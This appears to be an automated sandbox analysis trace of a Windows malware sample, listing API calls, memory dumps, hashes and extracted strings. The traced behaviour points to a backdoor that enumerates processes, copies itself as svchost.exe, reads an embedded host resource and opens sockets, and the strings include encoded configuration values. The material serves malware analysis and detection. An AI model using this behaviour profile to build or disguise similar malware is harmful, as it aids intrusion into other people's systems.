                                • CreateThread.KERNEL32(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
                                • String ID:
                                • API String ID: 1855471192-0
                                • Opcode ID: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                • Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
                                • Opcode Fuzzy Hash: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                • Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 00405198
                                • Sleep.KERNEL32(00000064), ref: 004051A6
                                  • Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
                                  • Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
                                  • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                • atoi.MSVCRT(?,?), ref: 004051BB
                                • Sleep.KERNEL32(00000064), ref: 004051CC
                                • CreateThread.KERNEL32(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA
                                Memory Dump Source
                                • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                 Similarity
                                • API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
                                • String ID:
                                • API String ID: 1855471192-0
                                • Opcode ID: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                • Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
                                • Opcode Fuzzy Hash: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                • Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9
                                APIs
                                • strcmp.MSVCRT ref: 00406731
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                • sprintf.MSVCRT ref: 004068CD
                                • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                 Similarity
                                • API ID: Table$??2@??3@_mbscpysprintfstrcmp
                                • String ID: %u Gbps$KVa7
                                • API String ID: 3420875952-2796686009
                                • Opcode ID: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
                                • Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
                                • Opcode Fuzzy Hash: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
                                • Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                 Similarity
                                • API ID: localtimetimewsprintf
                                • String ID: %04d%02d%02d
                                • API String ID: 1360778613-2607228566
                                • Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
                                • Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                • Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5
                                APIs
                                • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
                                • 6CFC6DE0.KERNEL32(00000000), ref: 00402A4D
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                 Similarity
                                • API ID: LibraryLoad
                                • String ID: WS2_32.dll$htons
                                • API String ID: 1029625771-178149120
                                • Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
                                • Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                • Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D
                                APIs
                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                • htons.WS2_32 ref: 004086B2
                                • connect.WS2_32(00000000,?,00000010), ref: 004086C5
                                • closesocket.WS2_32(00000000), ref: 004086D1
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                 Similarity
                                • API ID: closesocketconnecthtonssocket
                                • String ID:
                                • API String ID: 3817148366-0
                                • Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
                                • Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
                                • Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA
                                 Memory Dump Source
                                 • Source File: 00000002.00000002.1383419813.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.1383397827.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383419813.000000000040B000.00000040.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383468637.000000000040C000.00000080.00000001.01000000.00000005.sdmp
                                 • Associated: 00000002.00000002.1383520946.000000000040D000.00000004.00000001.01000000.00000005.sdmp
                                 Joe Sandbox IDA Plugin
                                 • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                 Similarity
                                • API ID: LibraryLoadwsprintf
                                • String ID: hra%u.dll
                                • API String ID: 2341783205-640331709
                                • Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                • Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
                                • Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
                                • Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99

                                Execution Graph

                                 Execution Coverage: 2.3%
                                 Dynamic/Decrypted Code Coverage: 53.2%
                                 Signature Coverage: 11.5%
                                 Total number of Nodes: 714
                                 Total number of Limit Nodes: 38
4019f2 20107->20111 20109 401a27 20108->20109 20113 401a16 20108->20113 20109->20110 20110->20105 20115 401beb 20111->20115 20121 402972 20113->20121 20116 401c29 20115->20116 20120 401edf 20115->20120 20117 401e25 VirtualFree 20116->20117 20116->20120 20118 401e89 20117->20118 20119 401e98 VirtualFree HeapFree 20118->20119 20118->20120 20119->20120 20120->20105 20122 4029b5 20121->20122 20123 40299f 20121->20123 20122->20105 20123->20122 20125 402859 20123->20125 20128 402866 20125->20128 20126 402916 20126->20122 20127 402887 VirtualFree 20127->20128 20128->20126 20128->20127 20130 402803 VirtualFree 20128->20130 20131 402820 20130->20131 20132 402850 20131->20132 20133 402830 HeapFree 20131->20133 20132->20128 20133->20128 20135 404b25 20134->20135 20136 404b1e 20134->20136 20135->19917 20138 404751 20136->20138 20145 4048ea 20138->20145 20141 404794 GetCPInfo 20143 4047a8 20141->20143 20144 4048de 20143->20144 20150 404990 GetCPInfo 20143->20150 20144->20135 20146 40490a 20145->20146 20147 4048fa GetOEMCP 20145->20147 20148 40490f GetACP 20146->20148 20149 404762 20146->20149 20147->20146 20148->20149 20149->20141 20149->20143 20149->20144 20151 4049b3 20150->20151 20157 404a7b 20150->20157 20152 4051ce 6 API calls 20151->20152 20153 404a2f 20152->20153 20154 404f7f 9 API calls 20153->20154 20155 404a53 20154->20155 20156 404f7f 9 API calls 20155->20156 20156->20157 20157->20144 20159 4015f5 20158->20159 20166 401000 20159->20166 20161 4015ff 20162 401622 20161->20162 20185 401480 20161->20185 20162->19954 20167 401010 20166->20167 20168 401018 20166->20168 20167->20161 20169 401031 VirtualAlloc 20168->20169 20170 401029 20168->20170 20171 401068 GetProcessHeap HeapAlloc VirtualAlloc VirtualAlloc 20169->20171 20172 40104e VirtualAlloc 20169->20172 20170->20161 20198 401150 20171->20198 20172->20171 20173 401062 20172->20173 20173->20161 20175 4010db 20203 401360 20175->20203 20177 4010f7 20183 40111d 20177->20183 20214 401220 20177->20214 20178 401520 11 API 
calls 20180 401127 20178->20180 20180->20161 20182 401132 20182->20161 20183->20178 20183->20182 20186 40149b 20185->20186 20188 4014e8 20185->20188 20186->20188 20241 405330 20186->20241 20189 401520 20188->20189 20190 4015ad 20189->20190 20195 40152d 20189->20195 20190->20162 20191 401584 20192 40159d GetProcessHeap HeapFree 20191->20192 20193 40158f VirtualFree 20191->20193 20192->20190 20193->20192 20194 40157a 20196 4019d0 7 API calls 20194->20196 20195->20191 20195->20194 20197 40156f FreeLibrary 20195->20197 20196->20191 20197->20195 20199 40120f 20198->20199 20200 401179 20198->20200 20199->20175 20200->20199 20201 4011bb VirtualAlloc 20200->20201 20202 40118e VirtualAlloc 20200->20202 20201->20200 20202->20200 20204 401383 IsBadReadPtr 20203->20204 20205 40145e 20203->20205 20204->20205 20206 40139c 20204->20206 20205->20177 20207 401466 20206->20207 20208 4013a7 LoadLibraryA 20206->20208 20207->20177 20209 401456 20208->20209 20212 4013bb 20208->20212 20209->20177 20211 401431 IsBadReadPtr 20211->20207 20211->20212 20212->20206 20212->20209 20212->20211 20213 401416 GetProcAddress 20212->20213 20220 401730 20212->20220 20213->20209 20213->20212 20215 401104 20214->20215 20218 40123f 20214->20218 20215->20182 20215->20183 20219 100027c0 GetInputState GetCurrentThreadId PostThreadMessageA GetMessageA 20215->20219 20216 401262 VirtualFree 20216->20218 20217 4012ae VirtualProtect 20217->20218 20218->20215 20218->20216 20218->20217 20219->20183 20221 40174b 20220->20221 20222 40173d 20220->20222 20224 401760 20221->20224 20225 401752 20221->20225 20223 4032b5 12 API calls 20222->20223 20229 401745 20223->20229 20227 401870 20224->20227 20239 40176e 20224->20239 20226 4019d0 7 API calls 20225->20226 20226->20229 20228 40198b 20227->20228 20238 401879 20227->20238 20228->20229 20230 401999 HeapReAlloc 20228->20230 20229->20212 20230->20228 20230->20229 20231 40182e HeapReAlloc 20231->20239 20232 4017e7 HeapAlloc 20232->20239 20233 401951 HeapReAlloc 20233->20238 
20234 401915 HeapAlloc 20234->20238 20235 401f14 5 API calls 20235->20239 20236 4029b7 6 API calls 20236->20238 20237 401beb VirtualFree VirtualFree HeapFree 20237->20239 20238->20229 20238->20233 20238->20234 20238->20236 20240 402972 VirtualFree HeapFree VirtualFree 20238->20240 20239->20229 20239->20231 20239->20232 20239->20235 20239->20237 20240->20238 20242 405348 20241->20242 20243 405383 20241->20243 20242->20186 20243->20242 20244 4053bc 15 API calls 20243->20244 20244->20243 20246 4033c2 GetCurrentProcess TerminateProcess 20245->20246 20247 4033d3 20245->20247 20246->20247 20248 401b10 20247->20248 20249 40343d ExitProcess 20247->20249 20248->19957 20250 100fa534 20252 100fa53b 20250->20252 20253 100fa54e VirtualAlloc 20252->20253 20254 100fa795 20252->20254 20255 100fa58e 20253->20255 20256 100fa8f9 ExitProcess 20253->20256 20257 100fa79f 20254->20257 20258 100fa7a9 20254->20258 20260 100fa599 20255->20260 20258->20256 20261 100fa5a8 20260->20261 20262 100fa60a VirtualFree 20261->20262 20264 100fa632 20262->20264 20271 100fa7b0 20264->20271 20265 100fa676 20266 100fa795 20265->20266 20267 100fa776 VirtualProtect 20265->20267 20270 100fa8f9 ExitProcess 20265->20270 20268 100fa79f 20266->20268 20269 100fa7a9 20266->20269 20267->20266 20267->20267 20268->20254 20269->20270 20270->20254 20272 100fa855 ExitProcess 20271->20272 20274 100fa7be 20271->20274 20272->20265 20274->20272 20275 100fa7d7 20274->20275 20275->20265

                                Control-flow Graph

                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10001A51
                                • wsprintfA.USER32 ref: 10001A8D
                                  • Part of subcall function 100018A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                                  • Part of subcall function 100018A0: Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                                  • Part of subcall function 100018A0: GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                                  • Part of subcall function 100018A0: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                                  • Part of subcall function 100018A0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                                  • Part of subcall function 100018A0: _strcmpi.MSVCRT ref: 100019C8
                                  • Part of subcall function 100018A0: CloseHandle.KERNEL32(00000000), ref: 100019D2
                                  • Part of subcall function 100018A0: Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                                • CreateFileA.KERNEL32(?,C0000000,00000002,00000000,00000004,00000080,00000000), ref: 10001AB5
                                • CloseHandle.KERNEL32(00000000), ref: 10001ABC
                                • Sleep.KERNEL32(000001F4), ref: 10001ACD
                                • FindFirstFileA.KERNEL32(?,?), ref: 10001ADF
                                • GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 10001B20
                                • strstr.MSVCRT ref: 10001B33
                                • Sleep.KERNEL32(0000EA60), ref: 10001B54
                                • GetVersionExA.KERNEL32(?), ref: 10001B69
                                • GetSystemDefaultLCID.KERNEL32 ref: 10001B6F
                                • Sleep.KERNEL32(000493E0), ref: 10001BDB
                                • Sleep.KERNEL32(00124F80), ref: 10001BE9
                                • GetLocalTime.KERNEL32(?), ref: 10001BF3
                                • wsprintfA.USER32 ref: 10001C37
                                • _mkdir.MSVCRT ref: 10001C41
                                • Sleep.KERNEL32(000003E8), ref: 10001C4F
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10001CA9
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 10001CC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileSleep$CloseCreateCurrentDirectoryFirstHandleModuleNameProcessProcess32Systemwsprintf$CopyDefaultFindLocalNextOpenSnapshotTimeToolhelp32Version_mkdir_strcmpistrstr
                                • String ID: %s\%02d%02d%02d$%s\Default$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$2$2$2$5$5$5$5$7$7$8$8$8$AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==$HOST$\bb$\kk$\svchost.exe$\tt$a$c$c$c$c$c$c$d$f$f$h$h$h$h$h$k$m$m$m$o$o$o$o$o$o$open$p$p$p$t$t$t$t$t$t$t$t$x$x$x$x$x$x$x$z
                                • API String ID: 3656591282-2909406114
                                • Opcode ID: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
                                • Instruction ID: 533d04cf14412c8a4f261862c8818537b5c493b5014bb58e8f027dad95579e4f
                                • Opcode Fuzzy Hash: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
                                • Instruction Fuzzy Hash: D332803114C3C09AE331C6788859B9FBFD6ABE2704F48495DE2C95B2D2CAF59608C767

                                Control-flow Graph

                                [Control-flow graph for 100022f0-100027ba: executed / not executed basic blocks with the API calls made from each block; graph rendering data omitted]
                                APIs
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • sprintf.MSVCRT ref: 10002389
                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000239C
                                • GetLastError.KERNEL32 ref: 100023A4
                                • CloseHandle.KERNEL32(00000000), ref: 100023B2
                                • ExitProcess.KERNEL32 ref: 100023B9
                                • GetCurrentProcessId.KERNEL32 ref: 100023BF
                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100023CC
                                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 100023DA
                                • CloseHandle.KERNEL32(00000000), ref: 100023E1
                                • GetProcessWindowStation.USER32 ref: 1000241D
                                • OpenWindowStationA.USER32(winsta0,00000000,02000000), ref: 1000242E
                                • SetProcessWindowStation.USER32(00000000), ref: 10002439
                                • SetErrorMode.KERNEL32(00000001), ref: 10002441
                                • OpenEventA.KERNEL32(001F0003,00000000,?), ref: 100024D9
                                • Sleep.KERNEL32(0000003C), ref: 100024E7
                                • CloseHandle.KERNEL32(00000000), ref: 100024FE
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000251E
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 10002573
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 100025C4
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 10002615
                                • GetTickCount.KERNEL32 ref: 1000262D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@Process$CloseHandleOpenResourceStationWindow$Error$??2@ClassCountCreateCurrentEventExitFindLastLoadLockModeMutexPrioritySleepTicksprintf
                                • String ID: AAAAAA$BBBBBB$CCCCCC$KKKKKK$winsta0
                                • API String ID: 2686462936-682215413
                                • Opcode ID: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
                                • Instruction ID: d6d9c746deec09ccf39e80aeb4b031731eb3513f19be3073a2d6536fba1e20fc
                                • Opcode Fuzzy Hash: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
                                • Instruction Fuzzy Hash: 29C1E4B55083819BF721DF64DC85F9B7799EB85380F00092DFA8993286DB74AD48C7A3

                                Control-flow Graph

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
                                • Process32First.KERNEL32(00000000,00000000), ref: 100018FF
                                • GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
                                • _strcmpi.MSVCRT ref: 100019C8
                                • CloseHandle.KERNEL32(00000000), ref: 100019D2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 10001A01
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32_strcmpi
                                • String ID: .$l$o$p$r$r$x$x
                                • API String ID: 3180913536-1602884452
                                • Opcode ID: 0c4918338f6a803b253189e55312482d0137ad13600974e65a6d9a9b90dfe338
                                • Instruction ID: 3eff10a53c0cd3c299c3f0263232e505e9bf148dbb3316f1d2a2e0806b88e0d6
                                • Opcode Fuzzy Hash: 0c4918338f6a803b253189e55312482d0137ad13600974e65a6d9a9b90dfe338
                                • Instruction Fuzzy Hash: 0C41B4311093C19AF311CA28C8057DF7BD5EB96394F04096DF5D4962D1DBB8EA0C87A7

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
                                • FindFirstFileA.KERNEL32(?,?), ref: 10001546
                                • CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
                                • ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
                                • wsprintfA.USER32 ref: 100015B5
                                • CloseHandle.KERNEL32(00000000), ref: 100015BB
                                • wsprintfA.USER32 ref: 100015CA
                                • lstrlen.KERNEL32(?), ref: 100015D6
                                • wsprintfA.USER32 ref: 100015E2
                                • lstrlen.KERNEL32(?), ref: 100015E8
                                  • Part of subcall function 10001380: wsprintfA.USER32 ref: 100013C0
                                  • Part of subcall function 10001380: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
                                  • Part of subcall function 10001380: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
                                  • Part of subcall function 10001380: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
                                  • Part of subcall function 10001380: CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$wsprintf$Resource$CloseCreateDirectoryFindHandleSystemlstrlen$??2@??3@FirstLoadLockReadWrite
                                • String ID: Default$XXXXXX
                                • API String ID: 725747062-3873574582
                                • Opcode ID: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
                                • Instruction ID: 40cba41667d06f7893b38b0f0d94b15b22b4201403879db7e592d3493172572b
                                • Opcode Fuzzy Hash: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
                                • Instruction Fuzzy Hash: 4C31083120030467E318CB74DC91EEF379AEBC5771F040B2DFA56971C0DEA4AE0982A6
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
